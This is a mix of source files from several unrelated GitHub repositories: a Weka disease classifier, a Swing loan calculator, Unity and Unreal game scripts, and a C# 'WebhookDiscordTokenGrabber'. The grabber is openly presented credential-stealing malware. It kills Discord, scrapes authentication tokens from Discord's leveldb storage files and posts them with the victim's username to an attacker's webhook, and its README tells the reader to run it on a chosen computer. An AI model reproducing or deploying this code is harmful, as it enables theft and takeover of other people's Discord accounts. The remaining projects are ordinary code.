//import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import weka.classifiers.bayes.NaiveBayesUpdateable;

/**
 * REST controller that wires a Weka naive-Bayes classifier
 * ({@link NaiveBayesUpdateable}) to an HTTP diagnosis endpoint and trains
 * it from a bundled ARFF dataset at context startup.
 */
@Configuration
@RestController
public class DiseaseClassifierController {

	// Helper that builds the classifier and classifies symptom vectors.
	DiseaseClassifier dc= new DiseaseClassifier();
	// Shared classifier instance, trained once by trainClassifier() below.
	static final NaiveBayesUpdateable nb =new NaiveBayesUpdateable();
	// Training dataset (ARFF) of disease/symptom rows.
	static final String file = "dis_sym_dataset_comb.arff";

	/**
	 * GET /api/diagnosis — intended to classify the supplied symptom vector.
	 * The body is currently empty (the ResponseEntity return is commented
	 * out), so the endpoint does nothing and returns no content.
	 * NOTE(review): @RequestBody on a GET mapping is unusual — confirm the
	 * intended HTTP verb and response type.
	 */
	@GetMapping("/api/diagnosis")
	void diagnosis(@RequestBody String token ) {
		//return ResponseEntity.
	}

	/**
	 * Trains the classifier from the ARFF file when the Spring context is
	 * built (@Bean) and runs a smoke-test classification of a hard-coded
	 * symptom vector. Exceptions are only printed, not propagated, so a
	 * failed training leaves the classifier untrained but the app running.
	 */
	@Bean
	void trainClassifier() {
		try {
			String token = "0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0";
			dc.buildClassifier(nb, file);
			dc.classify(nb, token);
		} catch (Exception e) {
			// TODO Auto-generated catch block
			e.printStackTrace();
		}
	}
}
c7a3acb4edb49468ff5b12ec5aee6cf6349bcdc2
[ "Java" ]
2
Java
iamamirshabir/DIPS-UI
8957f99f649c488b8b876fe24129114e470c6dc7
fb6617549c7596bd154beaac386ee2bcade7a05b
refs/heads/master
<file_sep>/**
 * Model class for the loan calculator: holds the user's inputs (price,
 * down payment, tax rate, options total, loan term/rate) and computes the
 * sales-tax amount, total loan amount, and monthly/total payments.
 */
public class BunkerLoanInfo {
	//Payment Information panel
	private double tLoanAmount;   // total amount financed
	private double mPayment;      // monthly payment
	private double tPayment;      // total of all payments plus down payment
	private double salesTaxAmount;
	//Loan Term Panel
	private double loanTerm;      // term in months (24/36/48/60 from LoanTerm panel)
	private double loanRate;      // annual interest rate as a fraction (e.g. 0.045)
	//Financing Information panel
	private double basePrice;
	private double dPayment;      // down payment
	private double salesTax;      // tax rate stored as a fraction (e.g. 0.07)
	//Price with Options panel
	private Double totalPWO;
	//Constructor
	public BunkerLoanInfo(){
		loanTerm = 0.045;  // NOTE(review): 0.045 looks like an interest rate, not a term in months; loanRate is left 0.0 — confirm intended defaults
		salesTax = 0.07;
		totalPWO = 1200.0;
	}
	//Sets Loan Term (in months) and allows it to be retrieved
	public void setLoanTerm(double lT){
		loanTerm = lT;
	}
	public double getLoanTerm(){
		return(loanTerm);
	}
	//Sets Loan Rate (annual fraction) and allows it to be retrieved
	public void setLoanRate(double lR){
		loanRate = lR;
	}
	public double getLoanRate(){
		return(loanRate);
	}
	//Sets Base Price and allows it to be retrieved
	public void setBasePrice(double bP){
		basePrice = bP;
	}
	public double getBasePrice(){
		return(basePrice);
	}
	//Sets Down Payment and allows it to be retrieved
	public void setDownPayment(double dP){
		dPayment = dP;
	}
	public double getDownPayment(){
		return(dPayment);
	}
	//Sets Sales Tax (given as a percentage, stored as a fraction) and allows it to be retrieved
	public void setSalesTax(double sT){
		salesTax = sT /100;
	}
	public double getSalesTax(){
		return(salesTax);
	}
	//Sets Price with Options and allows it to be retrieved
	public void setPWO(double pwo){
		totalPWO = pwo;
	}
	public double getPWO(){
		return(totalPWO);
	}
	//Calculates Sales Tax Amount on (base price - down payment + options)
	public double calculateSalesTaxAmount(){
		salesTaxAmount = (basePrice - dPayment + totalPWO) * salesTax;
		return(salesTaxAmount);
	}
	//Calculates Loan Amount: taxable base plus the sales tax itself
	public double calculateLoanAmount(){
		tLoanAmount = basePrice - dPayment + totalPWO + calculateSalesTaxAmount();
		return(tLoanAmount);
	}
	//Calculates Monthly Payment using the standard amortization formula
	public double calculateMonthlyPayment(){
		mPayment = calculateLoanAmount() * (loanRate/12) / (1 - (Math.pow(1 / (1 + (loanRate/12)), loanTerm)));
		return(mPayment);
	}
	//Calculates Total Payment: all monthly payments plus the down payment
	public double calculateTotalPayment(){
		tPayment = calculateMonthlyPayment() * getLoanTerm() + getDownPayment();
		return(tPayment);
	}
}<file_sep>import javax.swing.*;

/**
 * Top-level application window ("BunkerTech LLC") that hosts the
 * CombinedPanels composite and shows itself on construction.
 */
@SuppressWarnings("serial")
public class LoanCalculateGUI extends JFrame {

	private CombinedPanels CP;
	private int width = 700;
	private int height = 500;

	public LoanCalculateGUI(){
		//Adds combined panels object
		CP = new CombinedPanels();
		//Sets title
		setTitle("BunkerTech LLC");
		setSize(width, height);
		//Sets close operation
		setDefaultCloseOperation(DISPOSE_ON_CLOSE);
		//setLayout(new FlowLayout());
		setLocationRelativeTo(null);  // center the window on screen
		//Adds combined panels to frame
		add(CP);
		//Makes it visible
		setVisible(true);
	}
}<file_sep>import java.awt.*;
import javax.swing.*;

/**
 * Banner panel showing the "BUNKER LOAN CALCULATOR" title in yellow on gray.
 */
@SuppressWarnings("serial")
public class Header extends JPanel {

	private JLabel ALC;

	public Header(){
		setLayout(new FlowLayout());
		//Creates the loan-calculator title label
		ALC = new JLabel("BUNKER LOAN CALCULATOR", SwingConstants.CENTER);
		ALC.setFont(new Font("Source Code Pro", Font.PLAIN, 16));
		//Sets foreground and background colors
		ALC.setForeground(Color.YELLOW);
		setBackground(Color.GRAY);
		//Add to panel
		add(ALC);
	}
}<file_sep>import javax.swing.*;
import java.awt.*;
import java.awt.event.ActionListener;

/**
 * Radio-button group for choosing a loan term / interest-rate combination.
 * The caller-supplied ActionListener fires on every selection; the chosen
 * rate and term are then pushed back in through the setters.
 * NOTE(review): loanTerm/loanRate stay 0.0 until a button event fires, even
 * though the 24-month option starts selected — confirm intended defaults.
 */
@SuppressWarnings("serial")
public class LoanTerm extends JPanel {

	private ButtonGroup bg;
	private JRadioButton twoFour;
	private JRadioButton threeSix;
	private JRadioButton fourEight;
	private JRadioButton sixZero;
	private double loanTerm;   // selected term in months
	private double loanRate;   // selected annual rate as a fraction

	public LoanTerm(ActionListener e){
		setLayout(new GridLayout(4,1));
		//Creates Radio Buttons (24 months selected by default)
		twoFour = new JRadioButton("24 Months - Interest Rate of 4.5%", true);
		threeSix = new JRadioButton("36 Months - Interest Rate of 5.5%");
		fourEight = new JRadioButton("48 Months - Interest Rate of 6.5%");
		sixZero = new JRadioButton("60 Months - Interest Rate of 7.0%");
		//Adds them to button group so only one can be selected
		bg = new ButtonGroup();
		bg.add(twoFour);
		bg.add(threeSix);
		bg.add(fourEight);
		bg.add(sixZero);
		twoFour.addActionListener(e);
		threeSix.addActionListener(e);
		fourEight.addActionListener(e);
		sixZero.addActionListener(e);
		//Adds them to panel
		add(twoFour);
		add(threeSix);
		add(fourEight);
		add(sixZero);
		//Creates Border
		setBorder(BorderFactory.createTitledBorder("Loan Term"));
	}

	public void setLoanRate(double lr){
		loanRate = lr;
	}
	public void setLoanTerm(double lt){
		loanTerm = lt;
	}
	//Allows loanRate and loanTerm to be retrieved
	public double getLoanRate(){
		return(loanRate);
	}
	public double getLoanTerm(){
		return(loanTerm);
	}
	//Re-selects the default 24-month option (used by the Reset action)
	public void setLoanTerm(boolean t){
		twoFour.setSelected(t);
	}
}<file_sep># BunkerLoanCalculator
Calculator for projects
<file_sep>import javax.swing.*;
import java.awt.*;

/**
 * Input panel for base contract price, down payment, and sales-tax
 * percentage; exposes the raw text-field values as Strings.
 */
@SuppressWarnings("serial")
public class FinanceInfo extends JPanel {

	private JLabel basePrice;
	private JLabel dPay;
	private JLabel salesTax;
	private JTextField bP;
	private JTextField dP;
	private JTextField sT;

	public FinanceInfo(){
		setLayout(new GridLayout(3,2));
		//Creates labels and text-fields with their default values
		basePrice = new JLabel("Base Contract Price:");
		bP = new JTextField("0.00");
		dPay = new JLabel("Down Payment:");
		dP = new JTextField("0.00");
		salesTax = new JLabel("Sales Tax Percentage:");
		sT = new JTextField("7.00");
		//Adds them to panel
		add(basePrice);
		add(bP);
		add(dPay);
		add(dP);
		add(salesTax);
		add(sT);
		//Creates border
		setBorder(BorderFactory.createTitledBorder("Financing Information"));
	}

	//Allows base price to be retrieved
	public String getBasePrice(){
		return(bP.getText());
	}
	//Allows down payment to be retrieved
	public String getDownPayment(){
		return(dP.getText());
	}
	//Allows sales tax to be retrieved
	public String getSalesTax(){
		return(sT.getText());
	}
	public void setBasePrice(String bp){
		bP.setText(bp);
	}
	public void setDownPayment(String dp){
		dP.setText(dp);
	}
	public void setSalesTax(String st){
		sT.setText(st);
	}
}<file_sep>import javax.swing.*;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.text.DecimalFormat;

/**
 * Main composite panel: header (NORTH), four input/output panels in a 2x2
 * grid (CENTER), and the action buttons (SOUTH). Also owns the
 * BunkerLoanInfo model and the listeners that wire UI events to it.
 */
@SuppressWarnings("serial")
public class CombinedPanels extends JPanel {

	private JPanel center;
	private Header Head;
	private PaymentInfo PI;
	private LoanTerm LT;
	private FinanceInfo FI;
	private PWO pwo;
	private ActionButtons AB;
	private BunkerLoanInfo BLI;

	public CombinedPanels(){
		setLayout(new BorderLayout());
		center = new JPanel();
		center.setLayout(new GridLayout(2,2));
		//Creates instance of BunkerLoanInfo
		BLI = new BunkerLoanInfo();
		//Creates instances of all the panels
		Head = new Header();
		PI = new PaymentInfo();
		LT = new LoanTerm(new LoanTermListener());
		FI = new FinanceInfo();
		pwo = new PWO();
		AB = new ActionButtons();
		AB.setListener(new ExitButtonListener());
		AB.setListener(new CalculateButtonListener());
		AB.setListener(new ResetButtonListener());
		//Adds particular panels to a combined panel
		center.add(PI);
		center.add(LT);
		center.add(FI);
		center.add(pwo);
		//Adds panels to appropriate location
		add(Head, BorderLayout.NORTH);
		add(center, BorderLayout.CENTER);
		add(AB, BorderLayout.SOUTH);
		//Sends values from panel components to BunkerLoanInfo
		BLI.setPWO(pwo.getPWO());
		BLI.setBasePrice(Double.parseDouble(FI.getBasePrice()));
		BLI.setDownPayment(Double.parseDouble(FI.getDownPayment()));
		BLI.setSalesTax(Double.parseDouble(FI.getSalesTax()));
		BLI.setLoanRate(LT.getLoanRate());
		BLI.setLoanTerm(LT.getLoanTerm());
	}

	//Maps the selected radio-button caption to its rate/term pair
	private class LoanTermListener implements ActionListener{
		public void actionPerformed(ActionEvent e){
			//Sets loanRate and loanTerm depending on what radio button is selected
			if(e.getActionCommand().equals("24 Months - Interest Rate of 4.5%")){
				LT.setLoanRate(0.045);
				LT.setLoanTerm(24.0);
			}
			else if(e.getActionCommand().equals("36 Months - Interest Rate of 5.5%")){
				LT.setLoanRate(0.055);
				LT.setLoanTerm(36.0);
			}
			else if(e.getActionCommand().equals("48 Months - Interest Rate of 6.5%")){
				LT.setLoanRate(0.065);
				LT.setLoanTerm(48.0);
			}
			else if(e.getActionCommand().equals("60 Months - Interest Rate of 7.0%")){
				LT.setLoanRate(0.07);
				LT.setLoanTerm(60.0);
			}
		}
	}

	//Restores every panel to its initial default values
	private class ResetButtonListener implements ActionListener{
		public void actionPerformed(ActionEvent e){
			if(e.getActionCommand().equals("Reset")){
				PI.reset();
				LT.setLoanTerm(true);
				FI.setBasePrice("0.00");
				FI.setDownPayment("0.00");
				FI.setSalesTax("7.00");
				pwo.setPWO(true);
			}
		}
	}

	//Exits the program
	private class ExitButtonListener implements ActionListener{
		public void actionPerformed(ActionEvent e){
			if(e.getActionCommand().equals("Exit")){
				System.exit(0);
			}
		}
	}

	//Calculates Total Loan Amount, Monthly Payment, and Total Payment
	private class CalculateButtonListener implements ActionListener{
		public void actionPerformed(ActionEvent e){
			if(e.getActionCommand().equals("Calculate")){
				DecimalFormat df = new DecimalFormat("$#,##0.00");
				double loanAmount;
				double monthlyPayment;
				double totalPayment;
				//Pull the latest UI values into the model before computing
				BLI.setPWO(pwo.getPWO());
				BLI.setBasePrice(Double.parseDouble(FI.getBasePrice()));
				BLI.setDownPayment(Double.parseDouble(FI.getDownPayment()));
				BLI.setSalesTax(Double.parseDouble(FI.getSalesTax()));
				BLI.setLoanRate(LT.getLoanRate());
				BLI.setLoanTerm(LT.getLoanTerm());
				loanAmount = BLI.calculateLoanAmount();
				monthlyPayment = BLI.calculateMonthlyPayment();
				totalPayment = BLI.calculateTotalPayment();
				//Display the results as formatted currency strings
				PI.setTMP(String.valueOf(df.format(monthlyPayment)));
				PI.setTLA(String.valueOf(df.format(loanAmount)));
				PI.setTPA(String.valueOf(df.format(totalPayment)));
			}
		}
	}
}
<file_sep>
/**
 * Application entry point: constructs and shows the main window.
 */
public class Project1Driver {

	public static void main(String[] args) {
		@SuppressWarnings("unused")
		LoanCalculateGUI LCG = new LoanCalculateGUI();
	}
}
a757798850f35b344f48204768a908e0172dc504
[ "Markdown", "Java" ]
8
Java
Justin-Jason/BunkerLoanCalculator
288ca4ae00e67ff094460119820d133b1010f529
8e782830f9e5a70b636cc93fab305a7255473fcf
refs/heads/master
<repo_name>Vukkk/WebhookDiscordTokenGrabber<file_sep>/Grabbing.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.IO; using System.Diagnostics; using System.Text.RegularExpressions; using System.Net.Http; namespace WebhookDiscordTokenGrabber { public class Grabbing { public static void KillDiscord() { try { Process[] processes = Process.GetProcessesByName("Discord"); foreach (var process in processes) { process.Kill(); } } catch { return; } } public static string DropboxToken = "<KEY>"; // PASTE YOUR DROPBOX DEVELOPER APP TOKEN HERE. (GIVE THE APP FULL ACCESS TO YOUR DROPBOX!) public static void UploadLogFile() { var files = SearchForFile(); // to get log files if (files.Count == 0) { Console.WriteLine("Didn't find any log files"); return; } foreach (string token in files) { foreach (Match match in Regex.Matches(token, "[^\"]*")) { if (match.Length == 59) { Console.WriteLine($"Token={match.ToString()}"); using (StreamWriter sw = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenlogtoken.txt", true)) { sw.WriteLine($"Token={match.ToString()}"); } } } } string uploadfile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenlogtoken.txt"; List<string> SearchForFile() { List<string> ldbFiles = new List<string>(); string discordPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\"; if (!Directory.Exists(discordPath)) { Console.WriteLine("Discord path not found"); return ldbFiles; } foreach (string file in Directory.GetFiles(discordPath, "*.log", SearchOption.TopDirectoryOnly)) { string rawText = File.ReadAllText(file); if (rawText.Contains("oken")) { Console.WriteLine($"{Path.GetFileName(file)} added"); ldbFiles.Add(rawText); } } return ldbFiles; } } public static void UploadldbFile() { 
var files = SearchForFile(); // to get ldb files if (files.Count == 0) { Console.WriteLine("Didn't find any ldb files"); return; } foreach (string token in files) { foreach (Match match in Regex.Matches(token, "[^\"]*")) { if (match.Length == 59) { Console.WriteLine($"Token={match.ToString()}"); using (StreamWriter sw = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenldbtoken.txt", true)) { sw.WriteLine($"Token={match.ToString()}"); } } } } string uploadfile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenldbtoken.txt"; List<string> SearchForFile() { List<string> ldbFiles = new List<string>(); string discordPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\"; if (!Directory.Exists(discordPath)) { Console.WriteLine("Discord path not found"); return ldbFiles; } foreach (string file in Directory.GetFiles(discordPath, "*.ldb", SearchOption.TopDirectoryOnly)) { string rawText = File.ReadAllText(file); if (rawText.Contains("oken")) { Console.WriteLine($"{Path.GetFileName(file)} added"); ldbFiles.Add(rawText); } } return ldbFiles; } } private static readonly string _hookUrl = "abcdefghijklmnopqrstuvwxyz"; // PASTE YOUR WEBHOOK URL HERE public static void ReportTokens(/*List<string> tokenReport*/) { try { string writtenldbtoken = System.IO.File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenldbtoken.txt"); //.ldb upload try { HttpClient client = new HttpClient(); Dictionary<string, string> contents = new Dictionary<string, string> { { "content", $"Token report for '{Environment.UserName}'\n\n{string.Join("\n", writtenldbtoken)}" }, { "username", "WDTG by Kai" }, { "avatar_url", "https://cdn.discordapp.com/attachments/737989668242456688/737995846389596160/wdtg_avatar.PNG" } }; 
client.PostAsync(_hookUrl, new FormUrlEncodedContent(contents)).GetAwaiter().GetResult(); } catch { } } catch { Console.WriteLine("writtenldbtoken.txt is not found"); } try { string writtenlogtoken = System.IO.File.ReadAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\writtenlogtoken.txt"); //.log upload try { HttpClient client = new HttpClient(); Dictionary<string, string> contents = new Dictionary<string, string> { { "content", $"Token report for '{Environment.UserName}'\n\n{string.Join("\n", writtenlogtoken)}" }, { "username", "WDTG by Kai" }, { "avatar_url", "https://cdn.discordapp.com/attachments/737989668242456688/737995846389596160/wdtg_avatar.PNG" } }; client.PostAsync(_hookUrl, new FormUrlEncodedContent(contents)).GetAwaiter().GetResult(); } catch { } } catch { Console.WriteLine("writtenlogtoken.txt is not found"); } } } } <file_sep>/README.md # WebhookDiscordTokenGrabber Steals and uploads discord tokens to the given webhook address ## Steps: - Clone or download the source code - Open Solution - In Grabbing.cs at line 140 paste your own discord webhook - Compile the program - Run it on a choosen computer ## Buy me a coffee ☕: **[PayPal](https://www.paypal.me/iklevi)** ## Ps.: **I am not responsible for anything you are doing with this project. I made this project for educational purposes.** *This project is licensed under the MIT License.* <file_sep>/Program.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace WebhookDiscordTokenGrabber { class Program { static void Main(string[] args) { Grabbing.KillDiscord(); System.Threading.Thread.Sleep(7000); Grabbing.UploadLogFile(); Grabbing.UploadldbFile(); Grabbing.ReportTokens(); } } }
1b20e8f8713f295f168f97ccb601a0aebdfcee32
[ "Markdown", "C#" ]
3
C#
Vukkk/WebhookDiscordTokenGrabber
ea1e98577e67a37b86187729ff3ab6404c348eba
9a847cb3e8e91aed4d077f2310f16b9cbdb07e1f
refs/heads/master
<repo_name>RoyKedem/git-example<file_sep>/file.py
# Display the prompt string "hello world" and store whatever the user types
# (always a str under Python 3's input()) in x. The value is never used
# afterwards in this file.
x = input("hello world")
c4b5e99c996bc98577dcdb247e57b10a3b81e1c3
[ "Python" ]
1
Python
RoyKedem/git-example
c38b8e4a9a8e644e24525ffcf1697f35d3ca0dc0
00e5ad5b01e1ad1035394756c87aa2aab47771d3
refs/heads/master
<repo_name>Ryxali/Mothership<file_sep>/Mothership/Assets/ShipController.cs
using UnityEngine;
using System.Collections;

/// <summary>
/// Player ship controller. Toggles the ship between "online" (combat) mode,
/// where child turrets are active and empty build slots are hidden, and
/// "offline" (build) mode, where turrets are disabled and slots are shown.
/// While online, applies simple axis-driven movement every frame.
/// </summary>
public class ShipController : MonoBehaviour {

	// True while the ship is in combat mode (set only via enable/disable).
	public bool online { get; private set; }

	// Enter combat mode: activate every child Turret and hide every
	// TurretSlot placement indicator.
	public void enable() {
		online = true;
		Turret [] turrs = transform.GetComponentsInChildren<Turret> ();
		foreach (Turret t in turrs) {
			t.activate();
		}
		TurretSlot[] tslots = transform.GetComponentsInChildren<TurretSlot> ();
		foreach (TurretSlot t in tslots) {
			t.hide ();
		}
	}

	// Leave combat mode: deactivate every child Turret and show the
	// TurretSlot indicators again so turrets can be (re)placed.
	public void disable() {
		online = false;
		Turret [] turrs = transform.GetComponentsInChildren<Turret> ();
		foreach (Turret t in turrs) {
			t.deactivate();
		}
		TurretSlot[] tslots = transform.GetComponentsInChildren<TurretSlot> ();
		foreach (TurretSlot t in tslots) {
			t.show ();
		}
	}

	// Update is called once per frame
	// Drives the ship only while online: forward/back thrust from the
	// "Vertical" axis along the ship's local up, and turning from the
	// "Horizontal" axis (negated; 90 presumably deg/sec at full deflection).
	// NOTE(review): GetComponent<Rigidbody2D>() is looked up twice per frame;
	// caching it in Awake would avoid the repeated lookup — confirm before
	// changing behavior-adjacent code.
	void Update () {
		if (online) {
			GetComponent<Rigidbody2D>().velocity = transform.TransformDirection(Vector2.up) * Input.GetAxis("Vertical");
			GetComponent<Rigidbody2D>().angularVelocity = -Input.GetAxis("Horizontal") * 90;
		}
	}
}
<file_sep>/Mothership/Assets/CameraZoom.cs
using UnityEngine;
using System.Collections;

/// <summary>
/// Scroll-wheel zoom for an orthographic camera on this GameObject.
/// Scales the camera's initial orthographicSize by curZoom/10, clamped
/// between maxZoom (closest) and minZoom (farthest).
/// </summary>
public class CameraZoom : MonoBehaviour {
	// Closest allowed zoom factor (smaller value = closer; slider 10..1).
	[Range(10, 1)]
	public float maxZoom = 2;
	// Farthest allowed zoom factor (slider 20..10).
	[Range(20, 10)]
	public float minZoom = 10;

	// Camera's orthographicSize captured at startup; all zooming is
	// expressed relative to this baseline.
	private float baseSize;
	// Current zoom factor; 10 means "baseline size" (baseSize * 10/10).
	private float curZoom = 10;

	// Use this for initialization
	void Start () {
		baseSize = GetComponent<Camera>().orthographicSize;
	}

	// Update is called once per frame
	// Scroll up shrinks curZoom (zooms in); the factor 4 scales wheel
	// sensitivity. Result is clamped and applied to the camera each frame.
	void Update () {
		curZoom -= Input.GetAxis ("Mouse ScrollWheel") * 4;
		curZoom = Mathf.Clamp (curZoom, maxZoom, minZoom);
		GetComponent<Camera>().orthographicSize = baseSize * curZoom / 10.0f;
	}
}
<file_sep>/Source/Mothership/MothershipGameMode.cpp
// Copyright 1998-2015 Epic Games, Inc. All Rights Reserved.
#include "Mothership.h" #include "MothershipGameMode.h" #include "MothershipPawn.h" AMothershipGameMode::AMothershipGameMode() { // set default pawn class to our character class DefaultPawnClass = AMothershipPawn::StaticClass(); } <file_sep>/Mothership/Assets/Turret.cs using UnityEngine; using System.Collections; using System.Collections.Generic; using System.Linq; [ExecuteInEditMode] public class Turret : MonoBehaviour { public float radius_L { get; private set; } public float radius_R { get; private set; } public float maxAttackRadius = 30.0f; public float maxAttackRadius_L = 0; public float maxAttackRadius_R = 0; public int maxTargets = 1; public TurretSize size; public bool instantiated { get; private set; } public bool online { get; private set; } protected Enemy[] targets; public void instantiate(TurretSlot s) { radius_L = Mathf.Min(s.maxAttackRadius + s.maxAttackRadius_L, maxAttackRadius + maxAttackRadius_L); radius_R = Mathf.Min(s.maxAttackRadius + s.maxAttackRadius_R, maxAttackRadius + maxAttackRadius_R); instantiated = true; } void Update () { if (Application.isEditor) { maxAttackRadius = Mathf.Max((Mathf.Min(maxAttackRadius*2 + maxAttackRadius_L + maxAttackRadius_R, 360) - maxAttackRadius_L - maxAttackRadius_R)/2, 0); maxAttackRadius_L = Mathf.Max(Mathf.Min(maxAttackRadius_L, 180-maxAttackRadius), 0); maxAttackRadius_R = Mathf.Max(Mathf.Min(maxAttackRadius_R, 180-maxAttackRadius), 0); Vector3 l = transform.TransformDirection(Vector3.up); Vector3 r = transform.TransformDirection(Vector3.up); Quaternion ql = Quaternion.AngleAxis((-maxAttackRadius - maxAttackRadius_L), Vector3.back); Quaternion qr = Quaternion.AngleAxis((maxAttackRadius + maxAttackRadius_R), Vector3.back); l = ql * l; r = qr * r; Vector3 l2 = transform.TransformDirection(Vector3.up); Vector3 r2 = transform.TransformDirection(Vector3.up); Quaternion ql2 = Quaternion.AngleAxis((-radius_L), Vector3.back); Quaternion qr2 = Quaternion.AngleAxis((radius_R), Vector3.back); l2 = ql2 * l2; r2 = qr2* 
r2; Debug.DrawLine(transform.position, transform.position + l, Color.yellow); Debug.DrawLine(transform.position, transform.position + r, Color.yellow); Debug.DrawLine(transform.position, transform.position + l2, Color.red); Debug.DrawLine(transform.position, transform.position + r2, Color.red); } if (Application.isPlaying) { if(online) { targets = findTargets (maxTargets); if(targets != null && targets.Length > 0) { fire(); } } } } protected virtual void fire() { } public Enemy[] findTargets(int count) { Enemy[] enemies = GameController.instance.enemies.list; List<Enemy> candidates = new List<Enemy> (); Enemy candidate = null; float candidateDist = 100000.0f; foreach(Enemy e in enemies) { Vector3 x = Vector3.Cross(transform.up, Vector3.back); //Debug.Log("Cross: " + x); /*Debug.Log("dir: " + transform.up);/* float angle = Vector3.Dot( x, e.transform.position - transform.position);*/ float side = Vector3.Dot( x, e.transform.position - transform.TransformPoint(transform.localPosition)); float angle = Vector3.Angle(transform.up, (e.transform.position - transform.position).normalized); //Debug.Log("ANGLE: " + angle); if(side < 0) { if(angle < radius_L) { candidates.Add(e); /*float dist = Vector3.Distance(transform.position, e.transform.position); if(dist < candidateDist) { candidate = e; candidateDist = dist; }*/ } } else { if(angle < radius_R) { candidates.Add(e); /*float dist = Vector3.Distance(transform.position, e.transform.position); if(dist < candidateDist) { candidate = e; candidateDist = dist; }*/ } } } candidates = candidates.OrderBy (o => Vector3.Distance (transform.position, o.transform.position)).ToList (); Enemy[] result = new Enemy[Mathf.Min(candidates.Count, count)]; for (int i = 0; i < result.Length; ++i) { result[i] = candidates[i]; } return result; } public void activate() { online = true; } public void deactivate() { online = false; } } <file_sep>/Source/Mothership/MothershipGameMode.h // Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. 
#pragma once #include "GameFramework/GameMode.h" #include "MothershipGameMode.generated.h" UCLASS(minimalapi) class AMothershipGameMode : public AGameMode { GENERATED_BODY() public: AMothershipGameMode(); }; <file_sep>/Mothership/Assets/ButtonActions.cs using UnityEngine; using System.Collections; public class ButtonActions : MonoBehaviour { public void enterScene(string name) { Global.addToHistory (Application.loadedLevelName); Application.LoadLevel (name); } public void goBack(int count = 1) { string s = "null"; for(int i = 0; i < count; ++i) { string t = Global.popFromHistory (); if(t != null) s = t; } if(!s.Equals("null")) Application.LoadLevel (s); } public void goBackOne() { goBack (1); } public void exit() { Application.Quit (); } } <file_sep>/Mothership/Assets/Util.cs using UnityEngine; using System.Collections; public class Util { public static void Lookat(Transform subject, Transform target) { Vector3 diff = target.position - subject.position; diff.Normalize(); float rot_z = Mathf.Atan2(diff.y, diff.x) * Mathf.Rad2Deg; subject.rotation = Quaternion.Euler(0f, 0f, rot_z - 90); } /// <summary> /// Causes the subject to look towards the target. This function will only move a fraction /// for each call. 
/// </summary> /// <returns><c>true</c>, if the new angle is within 10 degrees of the target, <c>false</c> otherwise.</returns> /// <param name="subject">Subject.</param> /// <param name="target">Target.</param> public static bool LookTowards(Transform subject, Transform target) { Vector3 diff = target.position - subject.position; diff.Normalize(); float rot_z = Mathf.Atan2(diff.y, diff.x) * Mathf.Rad2Deg; Quaternion q = Quaternion.Euler(0f, 0f, rot_z - 90); subject.rotation = Quaternion.Lerp (subject.rotation, q, 0.1f); return q.eulerAngles.z - subject.eulerAngles.z < 10.0f; } } <file_sep>/Mothership/Assets/SMG_Turret.cs using UnityEngine; using System.Collections; public class SMG_Turret : Turret { public Projectile bullet; public Transform spawnPoint; public Transform axis; public float cooldown = 0.6f; public float projectileSpeed; private float lastShot; protected override void fire() { /*axis.LookAt (target.transform.position, Vector3.forward); Vector3 rot = axis.transform.eulerAngles; rot.z = 0; axis.transform.eulerAngles = rot;*/ Enemy target = targets [0]; if (Util.LookTowards (axis, target.transform)) { if (lastShot + cooldown < Time.time) { lastShot = Time.time; Projectile p = (Projectile)Instantiate (bullet); p.transform.position = spawnPoint.position; p.tag = tag; p.GetComponent<Rigidbody2D>().velocity = (target.transform.position - spawnPoint.position).normalized * projectileSpeed; 